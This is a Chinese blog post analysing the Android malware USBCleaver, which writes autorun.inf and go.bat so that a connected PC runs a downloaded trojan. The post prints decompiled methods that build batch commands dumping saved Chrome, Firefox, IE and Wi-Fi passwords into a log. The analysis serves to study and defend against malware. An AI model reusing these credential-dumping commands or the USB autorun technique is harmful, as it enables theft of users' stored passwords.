本文章由Jack_Jia编写,转载请注明出处。
文章链接:http://blog.csdn.net/jiazhijun/article/details/9179749
作者:Jack_Jia 邮箱: [email protected]
一、病毒样本基本信息
二、病毒代码分析
1、查看AndroidMainfest.xml文件
由清单文件可以看出,该恶意软件的入口点只有一个.USBCleaverActivity。
2、代码分析流程
代码树结构如下:
经过对程序唯一入口点的分析,恶意代码工作流程如下:
1、点击程序图标后运行USBCleaverActivity组件,该组件主要负责病毒运行环境的创建,如病毒所需目录结构。通过payloadHander完成autorun.inf文件写入(当以USB设备连接PC时,PC根据该文件配置运行go.bat),通过downloader完成对PC木马的下载。
2、downloader类负责PC木马压缩包的下载,下载后通过decompress完成PC木马压缩包解压
下载的PC木马压缩包信息如下:
3、payload通过payloadHandler产生go.bat,go.bat文件在autorun.info中配置运行。
public String dumpChromePassword() { this.dumpChromePassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [Dump Chrome PW] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\ChromePass.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n"; return this.dumpChromePassword; } public String dumpFFPassword() { this.dumpFFPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nEcho +----------------------------------+ >> %log% 2>&1\r\nEcho + [Dump Firefox PW] + >> %log% 2>&1\r\nEcho +----------------------------------+ >> %log% 2>&1\r\n%progdir%\\PasswordFox.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n"; return this.dumpFFPassword; } public String dumpIEPassword() { this.dumpIEPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [Dump IE PW] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\iepv.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n"; return this.dumpIEPassword; } public String dumpSysInfo() { this.dumpSysInfo = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [System info] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nIPCONFIG /all >> %log% 2>&1\r\n\r\n"; return this.dumpSysInfo; } public String dumpWifiPassword() { this.dumpWifiPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [Dump WIFI PW] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\WirelessKeyView.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n"; return this.dumpWifiPassword; }
go.bat文件内容就是执行下载PC木马的执行。到此PC平台木马的运行环境搭建完毕。当手持设备以USB模式连接PC后,PC木马即可成功运行。
五、相关链接
http://www.symantec.com/security_response/writeup.jsp?docid=2013-062010-1818-99
http://news.ccidnet.com/art/1032/20130625/5029495_1.html